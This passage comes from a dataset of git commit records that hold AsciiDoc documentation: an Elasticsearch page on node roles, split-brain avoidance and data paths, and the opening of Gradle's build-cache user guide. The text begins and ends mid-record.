cluster metadata will be stored. The `path.data` defaults\nto `$ES_HOME\/data` but can be configured in the `elasticsearch.yml` config\nfile an absolute path or a path relative to `$ES_HOME` as follows:\n\n[source,yaml]\n-----------------------\npath.data: \/var\/elasticsearch\/data\n-----------------------\n\nLike all node settings, it can also be specified on the command line as:\n\n[source,sh]\n-----------------------\n.\/bin\/elasticsearch -Epath.data=\/var\/elasticsearch\/data\n-----------------------\n\nTIP: When using the `.zip` or `.tar.gz` distributions, the `path.data` setting\nshould be configured to locate the data directory outside the Elasticsearch\nhome directory, so that the home directory can be deleted without deleting\nyour data! The RPM and Debian distributions do this for you already.\n\n\n[float]\n[[max-local-storage-nodes]]\n=== `node.max_local_storage_nodes`\n\nThe <<data-path,data path>> can be shared by multiple nodes, even by nodes from different\nclusters. This is very useful for testing failover and different configurations on your development\nmachine. In production, however, it is recommended to run only one node of Elasticsearch per server.\n\nBy default, Elasticsearch is configured to prevent more than one node from sharing the same data\npath. To allow for more than one node (e.g., on your development machine), use the setting\n`node.max_local_storage_nodes` and set this to a positive integer larger than one.\n\nWARNING: Never run different node types (i.e. master, data) from the same data directory. This can\nlead to unexpected data loss.\n\n[float]\n== Other node settings\n\nMore node settings can be found in <<modules,Modules>>. Of particular note are\nthe <<cluster.name,`cluster.name`>>, the <<node.name,`node.name`>> and the\n<<modules-network,network settings>>.\n\nifdef::include-xpack[]\n:edit_url!:\ninclude::{xes-repo-dir}\/node.asciidoc[]\nendif::include-xpack[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2c7471b755f9e5d3e89369e42538618b9e35b0c","subject":"Reinstate recommendation for \u2265 3 master-eligible nodes. (#27204)","message":"Reinstate recommendation for \u2265 3 master-eligible nodes. (#27204)\n\nIn the docs for 1.7 ([doc][doc-1.7], [src][src-1.7]) there was a recommendation\r\nfor at least 3 master-eligible nodes \"in critical clusters\" but this was lost\r\nwhen that page was updated in 2.0 ([doc][doc-2.0], [src][src-2.0]). I'd like to\r\nreinstate this.\r\n\r\n[doc-1.7]: https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/1.7\/modules-node.html\r\n[src-1.7]: https:\/\/github.com\/elastic\/elasticsearch\/blob\/2cbaccb2f2a495923bc64447fe3396e0fc58b3d3\/docs\/reference\/modules\/node.asciidoc\r\n[doc-2.0]: https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/2.0\/modules-node.html#split-brain\r\n[src-2.0]: https:\/\/github.com\/elastic\/elasticsearch\/blob\/4799009ad7ea8f885b6aedc6f62ad61d69e7a40d\/docs\/reference\/modules\/node.asciidoc\r\n","repos":"vroyer\/elasticassandra,vroyer\/elasticassandra,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elasticassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/modules\/node.asciidoc","new_file":"docs\/reference\/modules\/node.asciidoc","new_contents":"[[modules-node]]\n== Node\n\nAny time that you start an instance of Elasticsearch, you are starting a\n_node_. A collection of connected nodes is called a\n<<modules-cluster,cluster>>. If you are running a single node of Elasticsearch,\nthen you have a cluster of one node.\n\nEvery node in the cluster can handle <<modules-http,HTTP>> and\n<<modules-transport,Transport>> traffic by default. The transport layer\nis used exclusively for communication between nodes and the\n{javaclient}\/transport-client.html[Java `TransportClient`]; the HTTP layer is\nused only by external REST clients.\n\nAll nodes know about all the other nodes in the cluster and can forward client\nrequests to the appropriate node. Besides that, each node serves one or more\npurpose:\n\n<<master-node,Master-eligible node>>::\n\nA node that has `node.master` set to `true` (default), which makes it eligible\nto be <<modules-discovery-zen,elected as the _master_ node>>, which controls\nthe cluster.\n\n<<data-node,Data node>>::\n\nA node that has `node.data` set to `true` (default). Data nodes hold data and\nperform data related operations such as CRUD, search, and aggregations.\n\n<<ingest,Ingest node>>::\n\nA node that has `node.ingest` set to `true` (default). Ingest nodes are able\nto apply an <<pipeline,ingest pipeline>> to a document in order to transform\nand enrich the document before indexing. With a heavy ingest load, it makes\nsense to use dedicated ingest nodes and to mark the master and data nodes as\n`node.ingest: false`.\n\n<<modules-tribe,Tribe node>>::\n\nA tribe node, configured via the `tribe.*` settings, is a special type of\ncoordinating only node that can connect to multiple clusters and perform\nsearch and other operations across all connected clusters.\n\nBy default a node is a master-eligible node and a data node, plus it can\npre-process documents through ingest pipelines. This is very convenient for\nsmall clusters but, as the cluster grows, it becomes important to consider\nseparating dedicated master-eligible nodes from dedicated data nodes.\n\n[NOTE]\n[[coordinating-node]]\n.Coordinating node\n===============================================\n\nRequests like search requests or bulk-indexing requests may involve data held\non different data nodes. A search request, for example, is executed in two\nphases which are coordinated by the node which receives the client request --\nthe _coordinating node_.\n\nIn the _scatter_ phase, the coordinating node forwards the request to the data\nnodes which hold the data. Each data node executes the request locally and\nreturns its results to the coordinating node. In the _gather_ phase, the\ncoordinating node reduces each data node's results into a single global\nresultset.\n\nEvery node is implicitly a coordinating node. This means that a node that has\nall three `node.master`, `node.data` and `node.ingest` set to `false` will\nonly act as a coordinating node, which cannot be disabled. As a result, such\na node needs to have enough memory and CPU in order to deal with the gather\nphase.\n\n===============================================\n\n[float]\n[[master-node]]\n=== Master Eligible Node\n\nThe master node is responsible for lightweight cluster-wide actions such as\ncreating or deleting an index, tracking which nodes are part of the cluster,\nand deciding which shards to allocate to which nodes. It is important for\ncluster health to have a stable master node.\n\nAny master-eligible node (all nodes by default) may be elected to become the\nmaster node by the <<modules-discovery-zen,master election process>>.\n\nIMPORTANT: Master nodes must have access to the `data\/` directory (just like\n`data` nodes) as this is where the cluster state is persisted between node restarts.\n\nIndexing and searching your data is CPU-, memory-, and I\/O-intensive work\nwhich can put pressure on a node's resources. To ensure that your master\nnode is stable and not under pressure, it is a good idea in a bigger\ncluster to split the roles between dedicated master-eligible nodes and\ndedicated data nodes.\n\nWhile master nodes can also behave as <<coordinating-node,coordinating nodes>>\nand route search and indexing requests from clients to data nodes, it is\nbetter _not_ to use dedicated master nodes for this purpose. It is important\nfor the stability of the cluster that master-eligible nodes do as little work\nas possible.\n\nTo create a dedicated master-eligible node, set:\n\n[source,yaml]\n-------------------\nnode.master: true <1>\nnode.data: false <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> The `node.master` role is enabled by default.\n<2> Disable the `node.data` role (enabled by default).\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated master-eligible node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n\n[float]\n[[split-brain]]\n==== Avoiding split brain with `minimum_master_nodes`\n\nTo prevent data loss, it is vital to configure the\n`discovery.zen.minimum_master_nodes` setting (which defaults to `1`) so that\neach master-eligible node knows the _minimum number of master-eligible nodes_\nthat must be visible in order to form a cluster.\n\nTo explain, imagine that you have a cluster consisting of two master-eligible\nnodes. A network failure breaks communication between these two nodes. Each\nnode sees one master-eligible node... itself. With `minimum_master_nodes` set\nto the default of `1`, this is sufficient to form a cluster. Each node elects\nitself as the new master (thinking that the other master-eligible node has\ndied) and the result is two clusters, or a _split brain_. These two nodes\nwill never rejoin until one node is restarted. Any data that has been written\nto the restarted node will be lost.\n\nNow imagine that you have a cluster with three master-eligible nodes, and\n`minimum_master_nodes` set to `2`. If a network split separates one node from\nthe other two nodes, the side with one node cannot see enough master-eligible\nnodes and will realise that it cannot elect itself as master. The side with\ntwo nodes will elect a new master (if needed) and continue functioning\ncorrectly. As soon as the network split is resolved, the single node will\nrejoin the cluster and start serving requests again.\n\nThis setting should be set to a _quorum_ of master-eligible nodes:\n\n (master_eligible_nodes \/ 2) + 1\n\nIn other words, if there are three master-eligible nodes, then minimum master\nnodes should be set to `(3 \/ 2) + 1` or `2`:\n\n[source,yaml]\n----------------------------\ndiscovery.zen.minimum_master_nodes: 2 <1>\n----------------------------\n<1> Defaults to `1`.\n\nTo be able to remain available when one of the master-eligible nodes fails,\nclusters should have at least three master-eligible nodes, with\n`minimum_master_nodes` set accordingly. A <<rolling-upgrades,rolling upgrade>>,\nperformed without any downtime, also requires at least three master-eligible\nnodes to avoid the possibility of data loss if a network split occurs while the\nupgrade is in progress.\n\nThis setting can also be changed dynamically on a live cluster with the\n<<cluster-update-settings,cluster update settings API>>:\n\n[source,js]\n----------------------------\nPUT _cluster\/settings\n{\n \"transient\": {\n \"discovery.zen.minimum_master_nodes\": 2\n }\n}\n----------------------------\n\/\/ CONSOLE\n\/\/ TEST[catch:\/cannot set discovery.zen.minimum_master_nodes to more than the current master nodes\/]\n\nTIP: An advantage of splitting the master and data roles between dedicated\nnodes is that you can have just three master-eligible nodes and set\n`minimum_master_nodes` to `2`. You never have to change this setting, no\nmatter how many dedicated data nodes you add to the cluster.\n\n\n[float]\n[[data-node]]\n=== Data Node\n\nData nodes hold the shards that contain the documents you have indexed. Data\nnodes handle data related operations like CRUD, search, and aggregations.\nThese operations are I\/O-, memory-, and CPU-intensive. It is important to\nmonitor these resources and to add more data nodes if they are overloaded.\n\nThe main benefit of having dedicated data nodes is the separation of the\nmaster and data roles.\n\nTo create a dedicated data node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: true <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> The `node.data` role is enabled by default.\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated data node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n[[node-ingest-node]]\n=== Ingest Node\n\nIngest nodes can execute pre-processing pipelines, composed of one or more\ningest processors. Depending on the type of operations performed by the ingest\nprocessors and the required resources, it may make sense to have dedicated\ningest nodes, that will only perform this specific task.\n\nTo create a dedicated ingest node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: false <2>\nnode.ingest: true <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> Disable the `node.data` role (enabled by default).\n<3> The `node.ingest` role is enabled by default.\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated ingest node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n[[coordinating-only-node]]\n=== Coordinating only node\n\nIf you take away the ability to be able to handle master duties, to hold data,\nand pre-process documents, then you are left with a _coordinating_ node that\ncan only route requests, handle the search reduce phase, and distribute bulk\nindexing. Essentially, coordinating only nodes behave as smart load balancers.\n\nCoordinating only nodes can benefit large clusters by offloading the\ncoordinating node role from data and master-eligible nodes. They join the\ncluster and receive the full <<cluster-state,cluster state>>, like every other\nnode, and they use the cluster state to route requests directly to the\nappropriate place(s).\n\nWARNING: Adding too many coordinating only nodes to a cluster can increase the\nburden on the entire cluster because the elected master node must await\nacknowledgement of cluster state updates from every node! The benefit of\ncoordinating only nodes should not be overstated -- data nodes can happily\nserve the same purpose.\n\nTo create a dedicated coordinating node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: false <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> Disable the `node.data` role (enabled by default).\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated coordinating node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n== Node data path settings\n\n[float]\n[[data-path]]\n=== `path.data`\n\nEvery data and master-eligible node requires access to a data directory where\nshards and index and cluster metadata will be stored. The `path.data` defaults\nto `$ES_HOME\/data` but can be configured in the `elasticsearch.yml` config\nfile an absolute path or a path relative to `$ES_HOME` as follows:\n\n[source,yaml]\n-----------------------\npath.data: \/var\/elasticsearch\/data\n-----------------------\n\nLike all node settings, it can also be specified on the command line as:\n\n[source,sh]\n-----------------------\n.\/bin\/elasticsearch -Epath.data=\/var\/elasticsearch\/data\n-----------------------\n\nTIP: When using the `.zip` or `.tar.gz` distributions, the `path.data` setting\nshould be configured to locate the data directory outside the Elasticsearch\nhome directory, so that the home directory can be deleted without deleting\nyour data! The RPM and Debian distributions do this for you already.\n\n\n[float]\n[[max-local-storage-nodes]]\n=== `node.max_local_storage_nodes`\n\nThe <<data-path,data path>> can be shared by multiple nodes, even by nodes from different\nclusters. This is very useful for testing failover and different configurations on your development\nmachine. In production, however, it is recommended to run only one node of Elasticsearch per server.\n\nBy default, Elasticsearch is configured to prevent more than one node from sharing the same data\npath. To allow for more than one node (e.g., on your development machine), use the setting\n`node.max_local_storage_nodes` and set this to a positive integer larger than one.\n\nWARNING: Never run different node types (i.e. master, data) from the same data directory. This can\nlead to unexpected data loss.\n\n[float]\n== Other node settings\n\nMore node settings can be found in <<modules,Modules>>. Of particular note are\nthe <<cluster.name,`cluster.name`>>, the <<node.name,`node.name`>> and the\n<<modules-network,network settings>>.\n\nifdef::include-xpack[]\n:edit_url!:\ninclude::{xes-repo-dir}\/node.asciidoc[]\nendif::include-xpack[]\n","old_contents":"[[modules-node]]\n== Node\n\nAny time that you start an instance of Elasticsearch, you are starting a\n_node_. A collection of connected nodes is called a\n<<modules-cluster,cluster>>. If you are running a single node of Elasticsearch,\nthen you have a cluster of one node.\n\nEvery node in the cluster can handle <<modules-http,HTTP>> and\n<<modules-transport,Transport>> traffic by default. The transport layer\nis used exclusively for communication between nodes and the\n{javaclient}\/transport-client.html[Java `TransportClient`]; the HTTP layer is\nused only by external REST clients.\n\nAll nodes know about all the other nodes in the cluster and can forward client\nrequests to the appropriate node. Besides that, each node serves one or more\npurpose:\n\n<<master-node,Master-eligible node>>::\n\nA node that has `node.master` set to `true` (default), which makes it eligible\nto be <<modules-discovery-zen,elected as the _master_ node>>, which controls\nthe cluster.\n\n<<data-node,Data node>>::\n\nA node that has `node.data` set to `true` (default). Data nodes hold data and\nperform data related operations such as CRUD, search, and aggregations.\n\n<<ingest,Ingest node>>::\n\nA node that has `node.ingest` set to `true` (default). Ingest nodes are able\nto apply an <<pipeline,ingest pipeline>> to a document in order to transform\nand enrich the document before indexing. With a heavy ingest load, it makes\nsense to use dedicated ingest nodes and to mark the master and data nodes as\n`node.ingest: false`.\n\n<<modules-tribe,Tribe node>>::\n\nA tribe node, configured via the `tribe.*` settings, is a special type of\ncoordinating only node that can connect to multiple clusters and perform\nsearch and other operations across all connected clusters.\n\nBy default a node is a master-eligible node and a data node, plus it can\npre-process documents through ingest pipelines. This is very convenient for\nsmall clusters but, as the cluster grows, it becomes important to consider\nseparating dedicated master-eligible nodes from dedicated data nodes.\n\n[NOTE]\n[[coordinating-node]]\n.Coordinating node\n===============================================\n\nRequests like search requests or bulk-indexing requests may involve data held\non different data nodes. A search request, for example, is executed in two\nphases which are coordinated by the node which receives the client request --\nthe _coordinating node_.\n\nIn the _scatter_ phase, the coordinating node forwards the request to the data\nnodes which hold the data. Each data node executes the request locally and\nreturns its results to the coordinating node. In the _gather_ phase, the\ncoordinating node reduces each data node's results into a single global\nresultset.\n\nEvery node is implicitly a coordinating node. This means that a node that has\nall three `node.master`, `node.data` and `node.ingest` set to `false` will\nonly act as a coordinating node, which cannot be disabled. As a result, such\na node needs to have enough memory and CPU in order to deal with the gather\nphase.\n\n===============================================\n\n[float]\n[[master-node]]\n=== Master Eligible Node\n\nThe master node is responsible for lightweight cluster-wide actions such as\ncreating or deleting an index, tracking which nodes are part of the cluster,\nand deciding which shards to allocate to which nodes. It is important for\ncluster health to have a stable master node.\n\nAny master-eligible node (all nodes by default) may be elected to become the\nmaster node by the <<modules-discovery-zen,master election process>>.\n\nIMPORTANT: Master nodes must have access to the `data\/` directory (just like\n`data` nodes) as this is where the cluster state is persisted between node restarts.\n\nIndexing and searching your data is CPU-, memory-, and I\/O-intensive work\nwhich can put pressure on a node's resources. To ensure that your master\nnode is stable and not under pressure, it is a good idea in a bigger\ncluster to split the roles between dedicated master-eligible nodes and\ndedicated data nodes.\n\nWhile master nodes can also behave as <<coordinating-node,coordinating nodes>>\nand route search and indexing requests from clients to data nodes, it is\nbetter _not_ to use dedicated master nodes for this purpose. It is important\nfor the stability of the cluster that master-eligible nodes do as little work\nas possible.\n\nTo create a dedicated master-eligible node, set:\n\n[source,yaml]\n-------------------\nnode.master: true <1>\nnode.data: false <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> The `node.master` role is enabled by default.\n<2> Disable the `node.data` role (enabled by default).\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated master-eligible node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n\n[float]\n[[split-brain]]\n==== Avoiding split brain with `minimum_master_nodes`\n\nTo prevent data loss, it is vital to configure the\n`discovery.zen.minimum_master_nodes` setting (which defaults to `1`) so that\neach master-eligible node knows the _minimum number of master-eligible nodes_\nthat must be visible in order to form a cluster.\n\nTo explain, imagine that you have a cluster consisting of two master-eligible\nnodes. A network failure breaks communication between these two nodes. Each\nnode sees one master-eligible node... itself. With `minimum_master_nodes` set\nto the default of `1`, this is sufficient to form a cluster. Each node elects\nitself as the new master (thinking that the other master-eligible node has\ndied) and the result is two clusters, or a _split brain_. These two nodes\nwill never rejoin until one node is restarted. Any data that has been written\nto the restarted node will be lost.\n\nNow imagine that you have a cluster with three master-eligible nodes, and\n`minimum_master_nodes` set to `2`. If a network split separates one node from\nthe other two nodes, the side with one node cannot see enough master-eligible\nnodes and will realise that it cannot elect itself as master. The side with\ntwo nodes will elect a new master (if needed) and continue functioning\ncorrectly. As soon as the network split is resolved, the single node will\nrejoin the cluster and start serving requests again.\n\nThis setting should be set to a _quorum_ of master-eligible nodes:\n\n (master_eligible_nodes \/ 2) + 1\n\nIn other words, if there are three master-eligible nodes, then minimum master\nnodes should be set to `(3 \/ 2) + 1` or `2`:\n\n[source,yaml]\n----------------------------\ndiscovery.zen.minimum_master_nodes: 2 <1>\n----------------------------\n<1> Defaults to `1`.\n\nThis setting can also be changed dynamically on a live cluster with the\n<<cluster-update-settings,cluster update settings API>>:\n\n[source,js]\n----------------------------\nPUT _cluster\/settings\n{\n \"transient\": {\n \"discovery.zen.minimum_master_nodes\": 2\n }\n}\n----------------------------\n\/\/ CONSOLE\n\/\/ TEST[catch:\/cannot set discovery.zen.minimum_master_nodes to more than the current master nodes\/]\n\nTIP: An advantage of splitting the master and data roles between dedicated\nnodes is that you can have just three master-eligible nodes and set\n`minimum_master_nodes` to `2`. You never have to change this setting, no\nmatter how many dedicated data nodes you add to the cluster.\n\n\n[float]\n[[data-node]]\n=== Data Node\n\nData nodes hold the shards that contain the documents you have indexed. Data\nnodes handle data related operations like CRUD, search, and aggregations.\nThese operations are I\/O-, memory-, and CPU-intensive. It is important to\nmonitor these resources and to add more data nodes if they are overloaded.\n\nThe main benefit of having dedicated data nodes is the separation of the\nmaster and data roles.\n\nTo create a dedicated data node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: true <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> The `node.data` role is enabled by default.\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated data node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n[[node-ingest-node]]\n=== Ingest Node\n\nIngest nodes can execute pre-processing pipelines, composed of one or more\ningest processors. Depending on the type of operations performed by the ingest\nprocessors and the required resources, it may make sense to have dedicated\ningest nodes, that will only perform this specific task.\n\nTo create a dedicated ingest node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: false <2>\nnode.ingest: true <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> Disable the `node.data` role (enabled by default).\n<3> The `node.ingest` role is enabled by default.\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated ingest node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n[[coordinating-only-node]]\n=== Coordinating only node\n\nIf you take away the ability to be able to handle master duties, to hold data,\nand pre-process documents, then you are left with a _coordinating_ node that\ncan only route requests, handle the search reduce phase, and distribute bulk\nindexing. Essentially, coordinating only nodes behave as smart load balancers.\n\nCoordinating only nodes can benefit large clusters by offloading the\ncoordinating node role from data and master-eligible nodes. They join the\ncluster and receive the full <<cluster-state,cluster state>>, like every other\nnode, and they use the cluster state to route requests directly to the\nappropriate place(s).\n\nWARNING: Adding too many coordinating only nodes to a cluster can increase the\nburden on the entire cluster because the elected master node must await\nacknowledgement of cluster state updates from every node! The benefit of\ncoordinating only nodes should not be overstated -- data nodes can happily\nserve the same purpose.\n\nTo create a dedicated coordinating node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: false <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> Disable the `node.data` role (enabled by default).\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated coordinating node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n== Node data path settings\n\n[float]\n[[data-path]]\n=== `path.data`\n\nEvery data and master-eligible node requires access to a data directory where\nshards and index and cluster metadata will be stored. The `path.data` defaults\nto `$ES_HOME\/data` but can be configured in the `elasticsearch.yml` config\nfile an absolute path or a path relative to `$ES_HOME` as follows:\n\n[source,yaml]\n-----------------------\npath.data: \/var\/elasticsearch\/data\n-----------------------\n\nLike all node settings, it can also be specified on the command line as:\n\n[source,sh]\n-----------------------\n.\/bin\/elasticsearch -Epath.data=\/var\/elasticsearch\/data\n-----------------------\n\nTIP: When using the `.zip` or `.tar.gz` distributions, the `path.data` setting\nshould be configured to locate the data directory outside the Elasticsearch\nhome directory, so that the home directory can be deleted without deleting\nyour data! The RPM and Debian distributions do this for you already.\n\n\n[float]\n[[max-local-storage-nodes]]\n=== `node.max_local_storage_nodes`\n\nThe <<data-path,data path>> can be shared by multiple nodes, even by nodes from different\nclusters. This is very useful for testing failover and different configurations on your development\nmachine. In production, however, it is recommended to run only one node of Elasticsearch per server.\n\nBy default, Elasticsearch is configured to prevent more than one node from sharing the same data\npath. To allow for more than one node (e.g., on your development machine), use the setting\n`node.max_local_storage_nodes` and set this to a positive integer larger than one.\n\nWARNING: Never run different node types (i.e. master, data) from the same data directory. This can\nlead to unexpected data loss.\n\n[float]\n== Other node settings\n\nMore node settings can be found in <<modules,Modules>>. Of particular note are\nthe <<cluster.name,`cluster.name`>>, the <<node.name,`node.name`>> and the\n<<modules-network,network settings>>.\n\nifdef::include-xpack[]\n:edit_url!:\ninclude::{xes-repo-dir}\/node.asciidoc[]\nendif::include-xpack[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b3af1903ba92465072d231f85ba9dfca129463d","subject":"KARAF-4415 - Update the documentation about the verify goal","message":"KARAF-4415 - Update the documentation about the verify goal\n","repos":"grgrzybek\/karaf,grgrzybek\/karaf,grgrzybek\/karaf","old_file":"manual\/src\/main\/asciidoc\/developer-guide\/karaf-maven-plugin.adoc","new_file":"manual\/src\/main\/asciidoc\/developer-guide\/karaf-maven-plugin.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"32ce5d486d26d8415da4d7966061cc3ee24ff683","subject":"Clarify clean-up of shortest period affects all projects","message":"Clarify clean-up of shortest period affects all projects\n","repos":"gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/build-cache\/build_cache.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/build-cache\/build_cache.adoc","new_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[build_cache]]\n= Build Cache\n\nTIP: Want to learn the tips and tricks top engineering teams use to keep builds fast and performant? https:\/\/gradle.com\/training\/#build-cache-deep-dive[Register here] for our Build Cache Training.\n\n[[sec:build_cache_intro]]\n== Overview\n\nThe Gradle _build cache_ is a cache mechanism that aims to save time by reusing outputs produced by other builds.\nThe build cache works by storing (locally or remotely) build outputs and allowing builds to fetch these outputs from the cache when it is determined that inputs have not changed, avoiding the expensive work of regenerating them.\n\nA first feature using the build cache is _task output caching_.\nEssentially, task output caching leverages the same intelligence as <<more_about_tasks.adoc#sec:up_to_date_checks,up-to-date checks>> that Gradle uses to avoid work when a previous local build has already produced a set of task outputs.\nBut instead of being limited to the previous build in the same workspace, task output caching allows Gradle to reuse task outputs from any earlier build in any location on the local machine.\nWhen using a shared build cache for task output caching this even works across developer machines and build agents.\n\nApart from tasks, <<artifact_transforms.adoc#sec:abm_artifact_transforms,artifact transforms>> can also leverage the build cache and re-use their outputs similarly to task output caching.\n\nTIP: For a hands-on approach to learning how to use the build cache, start with reading through the <<build_cache_use_cases.adoc#use_cases_cache,use cases for the build cache>> and the follow up sections.\nIt covers the different scenarios that caching can improve and has detailed discussions of the different caveats you need to be aware of when enabling caching for a build.\n\n[[sec:build_cache_enable]]\n== Enable the Build Cache\n\nBy default, the build cache is not enabled. You can enable the build cache in a couple of ways:\n\nRun with `--build-cache` on the command-line::\nGradle will use the build cache for this build only.\nPut `org.gradle.caching=true` in your `gradle.properties`::\nGradle will try to reuse outputs from previous builds for all builds, unless explicitly disabled with `--no-build-cache`.\n\nWhen the build cache is enabled, it will store build outputs in the Gradle user home.\nFor configuring this directory or different kinds of build caches see <<#sec:build_cache_configure,Configure the Build Cache>>.\n\n[[sec:task_output_caching]]\n== Task Output Caching\n\nBeyond incremental builds described in <<more_about_tasks.adoc#sec:up_to_date_checks,up-to-date checks>>, Gradle can save time by reusing outputs from previous executions of a task by matching inputs to the task.\nTask outputs can be reused between builds on one computer or even between builds running on different computers via a build cache.\n\nWe have focused on the use case where users have an organization-wide remote build cache that is populated regularly by continuous integration builds.\nDevelopers and other continuous integration agents should load cache entries from the remote build cache.\nWe expect that developers will not be allowed to populate the remote build cache, and all continuous integration builds populate the build cache after running the `clean` task.\n\nFor your build to play well with task output caching it must work well with the <<more_about_tasks.adoc#sec:up_to_date_checks,incremental build>> feature.\nFor example, when running your build twice in a row all tasks with outputs should be `UP-TO-DATE`.\nYou cannot expect faster builds or correct builds when enabling task output caching when this prerequisite is not met.\n\nTask output caching is automatically enabled when you enable the build cache, see <<#sec:build_cache_enable,Enable the Build Cache>>.\n\n[[sec:task_output_caching_example]]\n=== What does it look like\n\nLet us start with a project using the Java plugin which has a few Java source files. We run the build the first time.\n\n----\n> gradle --build-cache compileJava\n:compileJava\n:processResources\n:classes\n:jar\n:assemble\n\nBUILD SUCCESSFUL\n----\n\nWe see the directory used by the local build cache in the output. Apart from that the build was the same as without the build cache.\nLet's clean and run the build again.\n\n----\n> gradle clean\n:clean\n\nBUILD SUCCESSFUL\n----\n\n----\n> gradle --build-cache assemble\n:compileJava FROM-CACHE\n:processResources\n:classes\n:jar\n:assemble\n\nBUILD SUCCESSFUL\n----\n\nNow we see that, instead of executing the `:compileJava` task, the outputs of the task have been loaded from the build cache.\nThe other tasks have not been loaded from the build cache since they are not cacheable. This is due to\n`:classes` and `:assemble` being <<more_about_tasks.adoc#sec:lifecycle_tasks,lifecycle tasks>> and `:processResources`\nand `:jar` being Copy-like tasks which are not cacheable since it is generally faster to execute them.\n\n[[sec:task_output_caching_details]]\n== Cacheable tasks\n\nSince a task describes all of its inputs and outputs, Gradle can compute a _build cache key_ that uniquely defines the task's outputs based on its inputs.\nThat build cache key is used to request previous outputs from a build cache or store new outputs in the build cache.\nIf the previous build outputs have been already stored in the cache by someone else, e.g. your continuous integration server or other developers, you can avoid executing most tasks locally.\n\nThe following inputs contribute to the build cache key for a task in the same way that they do for <<more_about_tasks.adoc#sec:how_does_it_work,up-to-date checks>>:\n\n* The task type and its classpath\n* The names of the output properties\n* The names and values of properties annotated as described in <<more_about_tasks.adoc#sec:task_input_output_annotations,the section called \"Custom task types\">>\n* The names and values of properties added by the DSL via link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskInputs.html[TaskInputs]\n* The classpath of the Gradle distribution, buildSrc and plugins\n* The content of 